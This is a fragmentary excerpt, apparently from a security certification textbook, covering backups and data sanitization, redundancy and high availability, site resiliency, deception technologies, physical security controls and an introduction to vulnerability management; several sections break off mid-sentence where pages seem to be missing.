Critical capabilities for enterprise backup solutions typically include the following
features:
• Support for various environments (virtual, physical, and cloud)
Backup Frequency
Many dynamics influence data backup frequency requirements, including data
volatility, regulatory requirements, system performance, architecture capabilities,
and operational needs. Organizations with highly dynamic data or stringent
regulatory mandates may opt for more frequent backups to minimize the risk of
data loss and ensure compliance. Conversely, businesses with relatively stable data
or less stringent regulatory oversight might choose less frequent backups, balancing
data protection, data backup costs, and maintenance overhead. Ultimately, the
optimal backup frequency is determined by carefully assessing an organization’s
regulatory requirements, unique needs, risk tolerance, and resources.
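The trade-off above can be made concrete with a recovery point objective (RPO): in the worst case, a failure strikes just before the next scheduled backup, so the backup interval bounds the maximum data loss. A minimal illustrative sketch (the function names are ours, not from any backup product):

```python
# Illustrative only: relate backup interval to worst-case data loss (RPO).
# A failure just before the next scheduled backup loses everything written
# since the previous backup, so the interval equals the worst-case loss window.

def max_data_loss_hours(backup_interval_hours: float) -> float:
    """Worst-case hours of lost work if a failure strikes just before a backup."""
    return backup_interval_hours

def required_interval_hours(rpo_hours: float) -> float:
    """Longest backup interval that still satisfies a recovery point objective."""
    return rpo_hours

# A nightly backup cannot satisfy a 4-hour RPO:
print(max_data_loss_hours(24) <= 4)   # False
# Backing up every 4 hours (or more often) can:
print(max_data_loss_hours(4) <= 4)    # True
```

More frequent backups shrink the loss window but increase storage, network, and maintenance costs, which is exactly the balancing act described above.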
Recovery Validation
Critical recovery validation techniques play a vital role in ensuring the effectiveness
and reliability of backup strategies. Organizations can identify potential issues
and weaknesses in their data recovery processes by testing backups and making
necessary improvements. One common technique is the full recovery test, which
involves restoring an entire system from a backup to a separate environment and
verifying the fully functional recovered system. This method helps ensure that all
critical components, such as operating systems, applications, and data, can be
restored and will function as expected.
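One piece of a full or partial recovery test can be automated: after restoring files to a separate environment, compare cryptographic digests against the source to confirm the restored data is intact. A minimal sketch, with the directory paths and the restore step itself left as assumptions:

```python
# Sketch of a post-restore integrity check: every file in the source tree must
# exist in the restored tree with an identical SHA-256 digest.
import hashlib
from pathlib import Path

def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def validate_restore(source_dir: Path, restored_dir: Path) -> list[str]:
    """Return relative paths of files that are missing or differ after restore."""
    failures = []
    for src in source_dir.rglob("*"):
        if src.is_file():
            rel = src.relative_to(source_dir)
            restored = restored_dir / rel
            if not restored.is_file() or sha256_of(src) != sha256_of(restored):
                failures.append(str(rel))
    return failures
```

An empty result list indicates the restored data subset matches the source; any entries point at files needing investigation. This checks data integrity only, not whether applications actually function, which the full recovery test covers.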
Another approach is the partial recovery test, where selected files, folders, or
databases are restored to validate the integrity and consistency of specific data
subsets. Organizations can perform regular backup audits, checking the backup
logs, schedules, and configurations to ensure backups are created and maintained
as intended and required. Furthermore, simulating disaster recovery scenarios,
• Filesystem snapshots, like those provided by ZFS or Btrfs, capture the state of
a file system at a given moment, enabling users to recover accidentally deleted
files or restore previous versions of files in case of data corruption.
• SAN snapshots are taken at the block-level storage layer within a storage area
network. Examples include snapshots in NetApp or Dell EMC storage systems,
which capture the state of the entire storage volume, allowing for rapid recovery
of large datasets and applications.
By utilizing VM, filesystem, and SAN snapshots, organizations can enhance their
data protection and recovery strategies, ensuring the availability and integrity of
their data across different storage layers and systems.
The checkpoint configuration section for a Hyper-V virtual machine. Checkpoints refer to Microsoft's
implementation of snapshot functionality. (Screenshot used with permission from Microsoft.)
Encrypting Backups
Encryption of backups is essential for various reasons, primarily data security,
privacy, and compliance. By encrypting backups, organizations add an extra layer
of protection against unauthorized access or theft, ensuring that sensitive data
remains unreadable without the appropriate decryption key. This is particularly
crucial for businesses dealing with sensitive customer data, intellectual property,
or trade secrets, as unauthorized access can lead to severe reputational damage,
financial loss, or legal consequences.
Copies of sensitive data stored in backup sets are often overlooked, so many
industries and jurisdictions have regulations that mandate the protection of
sensitive data stored in backups. Encrypting backups helps organizations meet
these regulatory requirements and avoid fines, penalties, or legal actions resulting
from noncompliance.
Asset Disposal
Asset disposal/decommissioning concepts focus on the secure and compliant
handling of data and storage devices at the end of their lifecycle or when they are
no longer needed. Some important concepts include the following:
Sanitization—Refers to the process of removing sensitive information from
storage media to prevent unauthorized access or data breaches. This process uses
specialized techniques, such as data wiping, degaussing, or encryption, to ensure
that the data becomes irretrievable. Sanitization is particularly important when
repurposing or donating storage devices, as it helps protect the organization’s
sensitive information and maintains compliance with data protection regulations.
Destruction—Involves the physical or electronic elimination of information stored
on media, rendering it inaccessible and irrecoverable. Physical destruction methods
include shredding, crushing, or incinerating storage devices, while electronic
destruction involves overwriting data multiple times or using degaussing techniques
to eliminate magnetic fields on storage media. Destruction is a crucial step in the
decommissioning process and ensures that sensitive data cannot be retrieved or
misused after the disposal of storage devices.
Certification—Refers to the documentation and verification of the data sanitization
or destruction process. This often involves obtaining a certificate of destruction
or sanitization from a reputable third-party provider, attesting that the data has
been securely removed or destroyed in accordance with industry standards and
regulations. Certification helps organizations maintain compliance with data
protection requirements, provides evidence of due diligence, and reduces the risk
of legal liabilities. Certifying data destruction without third-party involvement can be
challenging, as the latter provides an impartial evaluation.
Active KillDisk data wiping software. (Screenshot used with permission from LSoft
Technologies, Inc.)
Files deleted from a magnetic-type hard disk are not fully erased. Instead, the
sectors containing the data are marked as available for writing, and the data they
contain are only removed as new files are added. Similarly, the standard Windows
format tool will only remove references to files and mark all sectors as usable. For
this reason, the standard method of sanitizing an HDD is called overwriting. This
can be performed using the drive’s firmware tools or a utility program. The most
basic type of overwriting is called zero filling, which sets each bit to zero. Single
pass zero filling can leave patterns that can be read with specialist tools. A more
secure method is to overwrite the content with one pass of all zeros, then a pass of
all ones, and then a third pass in a pseudorandom pattern. Some federal agencies
require more than three passes. Overwriting can take considerable time, depending
on the number of passes required.
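The multi-pass scheme just described can be sketched at the file level. This is illustrative only: real sanitization targets the whole device, usually via the drive's firmware or a dedicated utility, because overwriting one file does not touch remapped sectors or free space.

```python
# Illustrative sketch of multi-pass overwriting applied to a single file:
# one pass of all zeros, one pass of all ones, then a pseudorandom pass.
import os

def overwrite_file(path: str, passes=(b"\x00", b"\xff", None)) -> None:
    """Overwrite a file in place; None in the pass list means pseudorandom data."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for fill in passes:
            f.seek(0)
            remaining = size
            while remaining > 0:
                chunk = min(remaining, 65536)
                f.write(os.urandom(chunk) if fill is None else fill * chunk)
                remaining -= chunk
            f.flush()
            os.fsync(f.fileno())   # force the pass to physical storage
```

Each extra pass multiplies the run time, which is why overwriting a large drive with three or more passes can take many hours.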
Review Activity:
Asset Management
4. You are advising a company about backup requirements for a few dozen
Topic 7B
Redundancy Strategies
Continuity of Operations
Continuity of operations (COOP) refers to the process of ensuring that an
organization can maintain or quickly resume its critical functions in the event of
a disruption, disaster, or crisis. COOP concepts and strategies aim to minimize
downtime, protect essential resources, and maintain business resilience. Key
elements of a COOP plan include identifying critical business functions, establishing
priorities, and determining the resources needed to support these functions.
Strategies often involve creating redundancy for IT systems and data, such as
implementing off-site backups, failover systems, and disaster recovery solutions.
Additionally, organizations may consider alternative work arrangements, such as
remote work or co-location arrangements, to maintain operations during a crisis.
Developing clear communication and decision-making protocols ensures that
employees understand their roles and responsibilities during an emergency.
Regular testing and updating of COOP plans are crucial
to ensure the organization can maintain essential functions during and after
disruptive events. Realistic scenarios designed to simulate various disruptions, such
as natural disasters, cyberattacks, or pandemics, must be used to assess the plan’s
effectiveness. Testing methods often include tabletop exercises, isolated functional
tests, or full-scale drills. Each approach provides different levels of assurance and
must therefore use pre-established evaluation criteria for measuring performance.
In essence, COOP strategies focus on proactively preparing for disruptions,
ensuring that organizations can continue to deliver essential services and minimize
the impact of unforeseen events on their operations.
Backups
Backups play a critical role in the continuity of operations plans (COOP) by
safeguarding against data loss and restoring systems and data in the event of
disruptions. Regular testing verifies the integrity and effectiveness of backups.
Testing backups helps ensure the backup process functions correctly by simulating
various scenarios and allows organizations to identify any issues or gaps in the
backup and recovery process. Testing backups validates the recoverability of
critical systems and data, reducing the risk of data loss and minimizing downtime
associated with disruptive events. Additionally, testing backups allows organizations
to assess their recovery plans, evaluate the speed and efficiency of their backup
systems, and ensure compliance with regulatory requirements. Inadequate backup
processes can lead to extended downtime, critical data loss, financial losses,
reputation damage, and noncompliance.
Capacity Planning
Capacity planning is a critical process in which organizations assess their current
and future resource requirements to ensure they can efficiently meet their business
objectives. This process involves evaluating and forecasting the necessary resources
in terms of people, technology, and infrastructure to support anticipated growth,
changes in demand, or other factors that may impact operations. For people,
capacity planning considers the number of employees, their skill sets, and the
potential need for additional training or hiring to meet future demands. This may
involve evaluating workforce productivity, analyzing staffing levels, and identifying
potential skills gaps. In terms of technology, capacity planning encompasses the
High Availability
High availability (HA) is crucial in IT infrastructure, ensuring systems remain
operational and accessible with minimal downtime. It involves designing and
implementing hardware components, servers, networking, datacenters, and
physical locations for fault tolerance and redundancy. In a high-availability setup,
redundant hardware components, such as power supplies, hard drives, and
network interfaces, reduce the risk of failure by allowing the system to continue
functioning if one component fails. Servers are often deployed in clusters or
paired configurations, which allows automatic failover from a primary server to a
secondary server in case of an issue.
Networking components, including switches, routers, and load balancers, are
also designed with redundancy in mind to maintain seamless connectivity. As the
backbone of high-availability infrastructure, datacenters employ redundant power
sources, cooling systems, and backup generators to ensure continuous operation.
Nines Value    Availability    Annual Downtime (hh:mm:ss)
Six            99.9999%        00:00:32
Five           99.999%         00:05:15
Four           99.99%          00:52:34
Three          99.9%           08:45:36
Two            99%             87:36:00
Downtime is calculated from the sum of scheduled service intervals plus unplanned
outages over the period.
System availability can refer to an overall process, but also to availability at the level of
a server or individual component.
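The downtime figures in the table follow directly from applying the availability percentage to a 365-day year; a small helper reproduces them:

```python
# Allowed annual downtime for a given availability percentage,
# assuming a 365-day (31,536,000-second) year.

def annual_downtime(availability_pct: float) -> str:
    """Return the allowed annual downtime as hh:mm:ss."""
    seconds = 365 * 24 * 60 * 60 * (1 - availability_pct / 100)
    h, rem = divmod(round(seconds), 3600)
    m, s = divmod(rem, 60)
    return f"{h:02d}:{m:02d}:{s:02d}"

print(annual_downtime(99.999))  # 00:05:15 -- "five nines"
print(annual_downtime(99.9))    # 08:45:36 -- "three nines"
```

Each additional nine cuts the permitted downtime by a factor of ten, which is why moving from three nines to five nines usually requires redundant hardware, clustering, and site-level resiliency rather than incremental improvements.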
Site Considerations
Enterprise environments often provision resiliency at the site level. An alternate
processing or recovery site is a location that can provide the same (or similar) level
of service. An alternate processing site might always be available and in use, while a
recovery site might take longer to set up or only be used in an emergency.
Operations are designed to failover to the new site until the previous site can be
brought back online. Failover is a technique that ensures a redundant component,
device, application, or site can quickly and efficiently take over the functionality of
an asset that has failed. For example, load balancers provide failover in the event
that one or more servers or sites behind the load balancer are down or are taking
too long to respond. Once the load balancer detects this, it will redirect inbound
traffic to an alternate processing server or site. Thus, redundant servers in the load
balancer pool ensure there is no or minimal interruption of service.
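The failover decision a load balancer makes can be sketched in a few lines: route each request to the first healthy server in the pool, skipping any that fail a health check. The server names are hypothetical, and the health check is a stand-in for a real probe (such as an HTTP request with a timeout):

```python
# Minimal failover sketch: pick the first server in the pool that
# passes a health check; raise if the whole pool is down.

def route(pool: list[str], health_check) -> str:
    """Return the first healthy server in priority order."""
    for server in pool:
        if health_check(server):
            return server
    raise RuntimeError("no healthy servers in pool")

pool = ["app1.example.internal", "app2.example.internal"]
down = {"app1.example.internal"}              # simulate a failed primary
print(route(pool, lambda s: s not in down))   # app2.example.internal
```

Real load balancers add scheduling (round robin, least connections) and continuous background health probes, but the core failover behavior is this skip-the-unhealthy-node logic.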
Site resiliency is described as hot, warm, or cold:
• A hot site can failover almost immediately. It generally means the site is within
the organization’s ownership and ready to deploy. For example, a hot site could
consist of a building with operational computer equipment kept updated with a
live data set.
• A warm site could be similar, but with the requirement that the latest data set
needs to be loaded.
• A cold site takes longer to set up. A cold site may be an empty building with
a lease agreement in place to install whatever equipment is required when
necessary.
“Economies of scale” is a concept that refers to the cost advantages that businesses can
achieve when they increase production and output. Essentially, the more a company
produces, the cheaper it becomes to deliver those products.
Robust testing practices allow organizations to ensure that high availability, load
balancing, and failover technologies effectively fulfill their purpose to minimize
unexpected outages and maximize performance.
Clustering
Where load balancing distributes traffic between independent processing nodes,
clustering allows multiple redundant processing nodes that share data with one
another to accept connections. If one of the nodes in the cluster stops working,
connections can failover to a working node. To clients, the cluster appears to
be a single server. A load balancer distributes client requests across available
server nodes in a farm or pool and is generally associated with managing web
traffic, whereas clusters provide redundancy and high availability for systems
such as databases and file servers.
Virtual IP
For example, an organization might want to provision two load balancer appliances
so that if one fails, the other can still handle client connections. Unlike load
balancing with a single appliance, the public IP used to access the service is shared
between the two instances in the cluster. This arrangement is referred to as a
virtual IP or shared or floating address. The instances are configured with a private
connection, on which each is identified by its “real” IP address. This connection runs
a redundancy protocol, such as Common Address Redundancy Protocol (CARP),
enabling the active node to “own” the virtual IP and respond to connections. The
redundancy protocol also implements a heartbeat mechanism to allow failover to
the passive node if the active one should suffer a fault.
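The heartbeat mechanism behind this failover can be sketched as a timeout check: the passive node claims the virtual IP when the active node's last heartbeat is older than a threshold. The timeout value is illustrative; a real implementation (CARP, or VRRP in keepalived) runs this exchange over the private link:

```python
# Sketch of active/passive failover on a virtual IP: the passive node takes
# over when the active node has been silent longer than the heartbeat timeout.

HEARTBEAT_TIMEOUT = 3.0  # seconds of silence before failover (illustrative)

def should_take_over(now: float, last_heartbeat_from_active: float) -> bool:
    """True if the passive node should claim the virtual IP."""
    return (now - last_heartbeat_from_active) > HEARTBEAT_TIMEOUT

print(should_take_over(10.0, 9.0))   # False: active heartbeated 1s ago
print(should_take_over(10.0, 5.0))   # True: 5s of silence, claim the VIP
```

Choosing the timeout is a trade-off: too short and transient network delays trigger needless failovers; too long and clients see an extended outage before the passive node takes over.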
Application Clustering
Clustering is also very commonly used to provision fault-tolerant application
services. If an application server suffers a fault in the middle of a session, the
session state data will be lost. Application clustering allows servers in the cluster to
communicate session information to one another. For example, if a user logs in on
one instance, the next session can start on another instance, and the new server
can access the cookies or other information used to establish the login.
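The session-sharing idea can be sketched with two server instances reading and writing state through a shared store. The in-memory dict below stands in for a replicated session store (such as Redis or a database); all names are illustrative:

```python
# Sketch of application clustering's session sharing: a session begun on one
# node can continue on another because both use the same session store.

shared_sessions: dict[str, dict] = {}   # stand-in for a replicated store

class AppServer:
    def __init__(self, name: str, store: dict):
        self.name, self.store = name, store

    def login(self, session_id: str, user: str) -> None:
        """Record the session in the shared store, not in node-local memory."""
        self.store[session_id] = {"user": user, "logged_in_on": self.name}

    def whoami(self, session_id: str) -> str:
        return self.store[session_id]["user"]

node_a = AppServer("node-a", shared_sessions)
node_b = AppServer("node-b", shared_sessions)
node_a.login("sess-42", "alice")
print(node_b.whoami("sess-42"))   # alice -- session survives failover to node-b
```

Had each node kept sessions in local memory instead, a node failure would force users to log in again; the shared store is what makes the failover transparent.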
Power Redundancy
All types of computer systems require a stable power supply to operate. Electrical
events, such as voltage spikes or surges, can crash computers and network
appliances, while loss of power from under-voltage events or power failures will
cause equipment to fail. Power management means deploying systems to ensure
that equipment is protected against these events and that network operations can
either continue uninterrupted or be recovered quickly.
Generators
A backup power generator can provide power to the whole building, often for
several days. Most generators use diesel, propane, or natural gas as a fuel source.
With diesel and propane, the main drawback is safe storage (diesel also has a shelf
life of between 18 months and 2 years); with natural gas, the issue is a reliable
gas supply in the event of a natural disaster. Datacenters are also investing in
renewable power sources, such as solar, wind, geothermal, hydrogen fuel cells, and
hydro. The ability to use renewable power is a strong factor in determining the best
site for new datacenters. Large-scale battery solutions, such as Tesla’s Powerpack
(tesla.com/powerpack), may provide an alternative to backup power generators.
There are also emerging technologies that use all the battery resources of a
datacenter as a microgrid for power storage (https://www.scientificamerican.com/
article/how-big-batteries-at-data-centers-could-replace-power-plants/).
Defense in Depth
Defense in depth is a comprehensive cybersecurity strategy that emphasizes the
implementation of multiple layers of protection to safeguard an organization’s
information and infrastructure. This approach is based on the principle that no
single security measure can completely protect against all threats. By deploying
a variety of defenses at different levels, organizations can create a more resilient
security posture that can withstand a wide range of attacks. For example, a defense
in depth strategy might include perimeter security measures such as firewalls
and intrusion detection systems to protect against external threats. Organizations
can implement segmentation, secure access controls, and traffic monitoring at
the network level to prevent unauthorized access and contain potential breaches.
Endpoint security solutions, such as antivirus software and device hardening, help
protect individual devices, while regular patch management ensures software
vulnerabilities are addressed promptly.
Additionally, implementing strong user authentication methods, such as multifactor
authentication, can further secure access to sensitive data and systems. Finally,
employee security awareness training and incident response planning are essential
components of a defense in depth strategy, helping to minimize human error and
ensure a rapid response to security incidents.
Vendor Diversity
Vendor diversity is essential for several reasons, offering benefits not only in terms
of cybersecurity but also in business resilience, innovation, and competition:
• Cybersecurity—Relying on a single vendor for all software and hardware
solutions can create a single point of failure. The entire infrastructure may be
at risk if a vulnerability is discovered in that vendor’s products. Vendor diversity
introduces multiple technologies, reducing the impact of a single vulnerability
and making it more difficult for attackers to exploit the entire system.
Other types of controls contribute to defense in depth, such as physical security controls
that block physical access to computer equipment and policies designed to define
appropriate use and consequences for noncompliance.
Multi-Cloud Strategies
A multi-cloud strategy offers several benefits for both cybersecurity operations and
business needs by leveraging the strengths of multiple cloud service providers. This
approach enhances cybersecurity by diversifying the risk associated with a single
point of failure, as vulnerabilities or breaches in one cloud provider’s environment
are less likely to compromise the entire infrastructure. Additionally, a multi-cloud
strategy can improve security posture by implementing unique security features
and services offered by different cloud providers. From a business perspective, a
multi-cloud approach promotes vendor independence, reducing the risk of vendor
lock-in and ensuring organizations can adapt to changing market conditions
or technology trends. This strategy fosters healthy competition among cloud
providers, often leading to more favorable pricing and better service offerings.
Furthermore, a multi-cloud strategy enables organizations to optimize their IT
infrastructure by selecting the most suitable cloud services for specific workloads or
applications, enhancing performance and cost efficiency.
In a practical example of a multi-cloud strategy, a company operating a large
e-commerce platform can distribute workloads across multiple cloud providers
to address high availability, data security, performance optimization, and
cost efficiency. By hosting the primary application infrastructure on one
cloud provider and using another for backup and disaster recovery, the
company ensures continuous operation even during outages.
Storing sensitive customer data with a cloud provider that offers advanced security
features and compliance certifications meets regulatory requirements. To address
latency and performance concerns, the company can leverage a cloud provider with
a global network of edge locations for content delivery and caching services. Finally,
cost-effective storage and processing services can be used by another provider for
big data analytics and reporting. This multi-cloud approach enables the e-commerce
company to build a more resilient, secure, and efficient IT infrastructure tailored to
their specific needs.
Deception Technologies
Deception and disruption technologies are cybersecurity resilience tools and
techniques to increase the cost of attack planning for the threat actor. Honeypots,
honeynets, honeyfiles, and honeytokens are all cybersecurity tools used to detect
and defend against attacks. Honeypots are decoy systems that mimic real systems
and applications. They are designed to allow security teams to monitor attacker
activity and gather information about their tactics and tools. Honeynets are a
network of interconnected honeypots that simulate an entire network, providing a
more extensive and realistic environment for attackers to engage with. Honeyfiles
are fake files that appear to contain sensitive information, used to detect attempts
to access and steal data. Honeytokens are fake credentials or other data items
used to distract attackers, trigger alerts, and provide insight into
attacker activity.
By deploying these tools, organizations can detect and monitor attacks, gather
intelligence about attackers and their methods, and proactively defend against
future attacks. These tools can also provide an additional layer of defense by
diverting attackers’ attention away from real systems and applications, reducing
the risk of successful attacks.
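Honeytoken detection reduces to a simple rule: a planted credential has no legitimate use, so any authentication attempt with it is suspicious by definition. A minimal sketch, with the account name and alert format entirely illustrative:

```python
# Sketch of honeytoken detection: any login attempt using a planted
# credential raises an alert, because no legitimate user ever touches it.

HONEYTOKENS = {"svc_backup_admin"}   # planted account; illustrative name

alerts: list[str] = []

def check_login(username: str, source_ip: str) -> None:
    """Flag any authentication attempt that uses a honeytoken credential."""
    if username in HONEYTOKENS:
        alerts.append(f"honeytoken '{username}' used from {source_ip}")

check_login("alice", "10.0.0.5")                 # normal login, no alert
check_login("svc_backup_admin", "203.0.113.9")   # trips the honeytoken
print(alerts)
```

Because the token generates no false positives from normal activity, even a single hit is a high-confidence indicator that someone has been reading places they should not.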
Disruption Strategies
Another type of active defense uses disruption strategies. These adopt some of
the obfuscation strategies used by malicious actors. The aim is to raise the attack
cost and tie up the adversary’s resources. Some examples of disruption strategies
include the following:
• Using bogus DNS entries to list multiple hosts that do not exist.
• Using port triggering or spoofing to return fake telemetry data when a host
detects port scanning activity. This will result in multiple ports being falsely
reported as open and slow down the scan. Telemetry can refer to any type of
measurement or data returned by remote scanning. Similar fake telemetry could
be used to report IP addresses as up when they are not, for instance.
Testing Resiliency
Method of Testing
Testing system resilience and incident response effectiveness are crucial for
organizations to recover from disruptions and maintain business continuity.
By conducting various tests, organizations can identify potential vulnerabilities,
evaluate the efficiency of their recovery strategies, and improve their overall
preparedness for real-life incidents.
• Tabletop Exercises involve teams discussing and working through hypothetical
scenarios to assess their response plans and decision-making processes. These
exercises help identify knowledge, communication, and coordination gaps,
ultimately strengthening the organization’s incident response capabilities. For
example, a tabletop exercise might simulate a ransomware attack to test how
well the organization’s IT and management teams collaborate to mitigate the
threat and restore operations.
Documentation
Business continuity documentation practices cover planning, implementation,
and evaluation. Documentation supports the testing process. Documentation
includes test plans outlining the objectives, scope, and methods of tests and the
roles and responsibilities of individuals involved. Test scripts (or scenarios) provide
step-by-step instructions for performing the tests, and test results identify strengths
and weaknesses of the business continuity plan and the technical capabilities
supporting it. Documentation is the foundation for clear communication and
reporting of activities. It provides a common reference point for those involved
in business continuity testing and facilitates effective communication with
management, executive teams, and other relevant stakeholders. Third-party
assessments and certifications offer an objective and independent evaluation of
an organization’s testing practices. Third-party assessments and certifications offer
objective evaluation, compliance verification, validation of testing effectiveness,
industry recognition, and recommendations for continuous improvement.
Examples of third-party evaluations include assessments performed in alignment
with ISO 22301, PCI DSS, and SOC 2.
Review Activity:
Redundancy Strategies
Topic 7C
Physical Security
Physical sites at risk of a terrorist attack will use barricades such as bollards and
security posts to prevent vehicles from speeding toward a building.
Fencing
The exterior of a building may be protected by fencing. Security fencing needs
to be transparent (so guards can see any attempt to penetrate it), robust (so that
it is difficult to cut), and secure against climbing (which is generally achieved by
making it tall and possibly by using razor wire). Fencing is generally effective, but
the drawback is that it gives a building an intimidating appearance. Buildings that
are used by companies to welcome customers or the public may use more discreet
security methods.
Lighting
Security lighting contributes enormously to the perception that a building is
safe and secure at night. Well-designed lighting helps to make people feel safe,
especially in public areas or enclosed spaces, such as parking garages. Security
lighting also acts as a deterrent by making intrusion more difficult and surveillance
(whether by camera or guard) easier. The lighting design needs to account for
overall light levels, the lighting of particular surfaces or areas (allowing cameras to
perform facial recognition, for instance), and avoid areas of shadow and glare.
Bollards
Bollards are generally short vertical posts made of steel, concrete, or other
similarly durable materials and installed at intervals around a perimeter or
entrance. Sometimes bollards are nonobvious and appear as sculptures or as
building design elements. They can be fixed or retractable, and some models can be
raised or lowered remotely. Bollards can serve several purposes, such as protecting
pedestrians from vehicular traffic, preventing unauthorized vehicle access,
and providing perimeter security for critical infrastructure and facilities.
They are often used to secure government buildings, airports, stadiums, store
entrances, and other public spaces. By preventing vehicles from entering restricted
areas, bollards can help mitigate the risks of vehicular attacks and accidents.
Bollards used to protect the entrance of Reading Train Station in Britain. (Image from user
rogerrutter © 123RF.com.)
Existing Structures
There may be a few options to adjust the site layout in existing premises.
When faced with cost constraints and the need to reuse existing infrastructure,
incorporating the following principles can be helpful:
• Locate secure zones, such as equipment rooms, as deep within the building as
possible, avoiding external walls, doors, and windows.
• Use a demilitarized zone design for the physical space. Position public access
areas so that guests do not pass near secure zones. Security mechanisms in
public areas should be highly visible to increase deterrence.
• Use signage and warnings to enforce the idea that security is tightly controlled.
Beyond basic “no trespassing” signs, some homes and offices also display signs
from the security companies whose services they are using. These may convince
intruders to stay away.
• Try to minimize traffic passing between zones. The flow of people should be “in
and out” rather than “across and between.”
• Give high-traffic public areas high visibility to hinder the covert use of gateways,
network access ports, and computer equipment, and simplify surveillance.
• In secure zones, position display screens or input devices away from pathways
or windows. Use one-way glass, visible only from the inside, so no one can
look in through windows.
Generic examples of locks—From left to right: a standard key lock, a deadbolt lock, and an
electronic keypad lock. (Images from user macrovector © 123RF.com.)
Generic examples of a biometric thumbprint scanner lock and a token-based key card lock.
(Images from user macrovector © 123RF.com.)
Cable Locks
Cable locks attach to a secure point on the device chassis. A server chassis might
come with both a metal loop and a Kensington security slot. As well as securing the
chassis to a rack or desk, the position of the secure point prevents the chassis from
being opened without removing the cable first.
Access Badges
Access badges are a fundamental component of physical security in larger
organizations where control over access to various locations is critical. Plastic cards
embedded with magnetic strips, radio frequency identification (RFID) chips, or
near-field communication (NFC) technology are issued to authorized individuals,
such as employees, contractors, or visitors, in place of physical keys. To gain
access, the badge holder swipes, taps, or brings the badge into proximity with
a reader at the access point, such as a door or turnstile. The reader
communicates with a control system to
verify the badge’s authenticity and the level of access granted to the badge holder.
If the system recognizes the badge as valid and authorized for that area, the door
unlocks, granting access.
It is important to note that implementing this type of access control system requires
magnetic door-locking mechanisms and access card readers, which depend upon
electrical power and network communications at each access point (such as a
doorway).
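The decision the control system makes can be sketched as a lookup: the reader sends the badge ID and door ID, and the system checks the badge against an access list for that door. The badge IDs and access table below are entirely illustrative:

```python
# Sketch of a badge-reader authorization check: unlock only if the badge is
# known and authorized for this specific door.

ACCESS_TABLE = {
    "badge-1001": {"lobby", "server-room"},   # illustrative entries
    "badge-1002": {"lobby"},
}

def unlock(badge_id: str, door: str) -> bool:
    """True if the control system authorizes this badge for this door."""
    return door in ACCESS_TABLE.get(badge_id, set())

print(unlock("badge-1001", "server-room"))  # True
print(unlock("badge-1002", "server-room"))  # False: lobby access only
print(unlock("badge-9999", "lobby"))        # False: unknown badge
```

Centralizing the table is what makes badges superior to keys for administration: revoking a lost badge or changing someone's access level is a data update, not a lock change.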
• Object Detection—Occurs when the camera system can detect changes to the
environment, such as a missing server or unknown device connected to a wall
port.
Circuit-based alarms are suited for use at the perimeter and on windows and doors.
These may register when a gateway is opened without using the lock mechanism
properly or when a gateway is held open for longer than a defined period. Motion
detectors are useful for controlling access to spaces not normally used. Duress
alarms are useful for exposed staff in public areas. An alarm might simply sound
an audible alert or be linked to a monitoring system. Many alarms are linked directly
to local law enforcement or third-party security companies. A silent alarm alerts
security personnel rather than sounding an audible alarm.
Sensor Types
Sensors are critical in implementing physical security measures, providing proactive
detection and alerting capabilities against potential security breaches. These
devices can employ various technologies, including infrared, pressure, microwave,
and ultrasonic systems, each with unique advantages and suitable applications.
• Infrared sensors are commonly used in motion detection systems. They detect
changes in heat patterns caused by moving objects, such as a human intruder.
These are often used in residential and commercial security systems, triggering
alarms or activating security lights when detecting motion.
• Pressure sensors are typically installed inside floors or mats and are activated
by weight. They can be used in high-security areas to detect unauthorized access
or even in retail environments to count foot traffic.
• Microwave sensors emit microwave pulses and measure the reflection off
a moving object. They are often combined with infrared detectors in dual-
technology motion sensors. These sensors are less likely to trigger false alarms,
as the infrared and microwave sensors must be tripped simultaneously to trigger
an alarm. These can be useful in securing large outdoor areas like parking lots or
fenced areas.
• Ultrasonic sensors emit sound waves at frequencies above the range of human
hearing and measure the time it takes for the waves to return after hitting an
object. They are often used in automated lighting systems to switch lights on
when someone enters a room and switch them off again when the room is
empty.
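The time-of-flight principle these sensors rely on can be shown with a rough calculation, assuming sound travels at about 343 m/s in room-temperature air:

```python
SPEED_OF_SOUND_M_S = 343.0  # in air at ~20 degrees C

def distance_m(round_trip_s: float) -> float:
    """The echo travels to the object and back,
    so halve the round-trip time."""
    return SPEED_OF_SOUND_M_S * round_trip_s / 2

# A 10 ms round trip puts the object about 1.7 m away.
distance_m(0.01)
```

A sensor detects presence by noticing that this computed distance suddenly shortens when something enters the monitored space.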
Review Activity:
Physical Security
4. What is a bollard?
Lesson 7
Summary
• Include key information such as asset type, location, value, and ownership.
• Keep track of the location and status of assets, especially those that are
mobile or prone to theft.
• Certain assets, such as those related to health and safety, data protection,
or environmental impact must be managed in compliance with specific
regulations to avoid legal penalties.
• Clustering
• Site resiliency
• Using risk assessments, identify assets that have high availability requirements
and provision redundancy to meet this requirement:
• Use dual power supply, PDUs, PSUs, and generators to make the power
system resilient.
• Use NIC teaming, multiple paths, and load balancing to make networks
resilient.
• Secure the site perimeter and access points using fencing, barricades/bollards,
and locks (physical, electronic, and biometric). If using smart cards, use a type
that is resistant to cloning/skimming.
• Monitor the site using security guards, CCTV, and drones/UAV, and use effective
lighting to maximize surveillance.
LESSON INTRODUCTION
Vulnerability management is critical to any organization’s cybersecurity strategy,
encompassing identifying, evaluating, treating, and reporting security vulnerabilities
in operating systems, applications, and other components of an organization’s IT
operations. Vulnerability management may involve patching outdated systems,
hardening configurations, or upgrading to more secure versions of operating
systems. For applications, it might include code reviews, security testing, and
updating third-party libraries.
Vulnerability scanning is a crucial component of this process, with specialized
tools utilized to identify potential weaknesses in an organization’s digital assets
automatically. These tools scan for known vulnerabilities such as open ports,
insecure software configurations, or outdated versions. Post scanning, analysis
is performed to validate, classify, and prioritize the identified vulnerabilities for
remediation based on factors such as the potential impact of a breach, the ease of
exploiting the vulnerability, and the importance of the asset at risk. This continuous
cycle of assessment and improvement helps organizations maintain safe and
secure computing environments.
Lesson Objectives
In this lesson, you will do the following:
• Describe the importance of vulnerability management.
Topic 8A
Device and OS Vulnerabilities
The widespread adoption of mobile operating systems like Android and iOS and their increasing
use as primary computing platforms instead of traditional computers make them
valuable targets for attack and exploitation. Android is open source, like Linux,
resulting in similar benefits and problems. Additionally, Android OS is fragmented
among different manufacturers and versions, resulting in inconsistent patching and
update support. iOS, while not open source like Android, has also been impacted
by several significant vulnerabilities.
The significance of OS vulnerabilities cannot be overstated, especially as specialized
